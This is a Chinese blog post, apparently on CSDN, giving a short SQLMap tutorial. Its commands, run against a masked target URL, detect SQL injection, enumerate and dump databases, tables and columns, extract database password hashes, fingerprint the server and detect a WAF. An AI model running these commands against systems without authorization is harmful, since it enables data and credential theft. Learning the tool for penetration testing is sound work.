渗透测试SQL注入篇之SQLMap使用与指令讲解

提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试

一、判断SQL注入点

通过SQL注入点来让我们进一步进行信息收集

利用SQLMap检测是否存在注入点:
(如果没有安装和配置SQLMap可以看一下这一篇文章,https://blog.csdn.net/lzp_5257/article/details/124145686?spm=1001.2014.3001.5502)

Python sqlmap.py -u "http://***.***.com"

引号中换为你的目标地址即可!

二、查询数据库信息

Python sqlmap.py -u "http://***.***.com" --dbs

三、根据数据库查询数据表

Python sqlmap.py -u "http://***.***.com" -D [指定数据库名称] --tables

四、根据数据表查询列信息

Python sqlmap.py -u "http://***.***.com" -D [指定数据库名称] -T [指定表名称] --columns

五、根据字段枚举字段内容

Python sqlmap.py -u "http://***.***.com" -D [指定数据库名称] -T [指定表名称] -C "[字段名称1],[字段名称2]" --dump

六、SQLMap一些其他命令介绍

1、查看数据库相关信息

Python sqlmap.py -u "http://***.***.com" --current-user     //枚举当前用户
Python sqlmap.py -u "http://***.***.com" --current-db     //枚举当前数据库
Python sqlmap.py -u "http://***.***.com" --is-dba     //枚举数据库权限
Python sqlmap.py -u "http://***.***.com" --passwords     //枚举数据库用户名密码
Python sqlmap.py -u "http://***.***.com" --passwords     //枚举数据库用户名密码

2、指纹识别

Python sqlmap.py -u "http://***.***.com" -f     //启动广泛的指纹识别
Python sqlmap.py -u "http://***.***.com" -b     //检测数据库指纹
Python sqlmap.py -u "http://***.***.com" --hostname     //枚举主机名称

3、Waf识别

Python sqlmap.py -u "http://***.***.com" --identify-waf     //检测waf信息

以上为SQLMap常用指令,如果想了解更多参数以及指令可以使用:

Python sqlmap.py -hh

关于更新问题

SQLMap不建议使用指令更新,可一直去Github重新下载替换一下

Python sqlmap.py -update

Github下载地址:
https://github.com/sqlmapproject/sqlmap

OK,先说这一些,开始奔放吧!!!
有任何问题可以私信,看到之后第一时间回复哦!!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值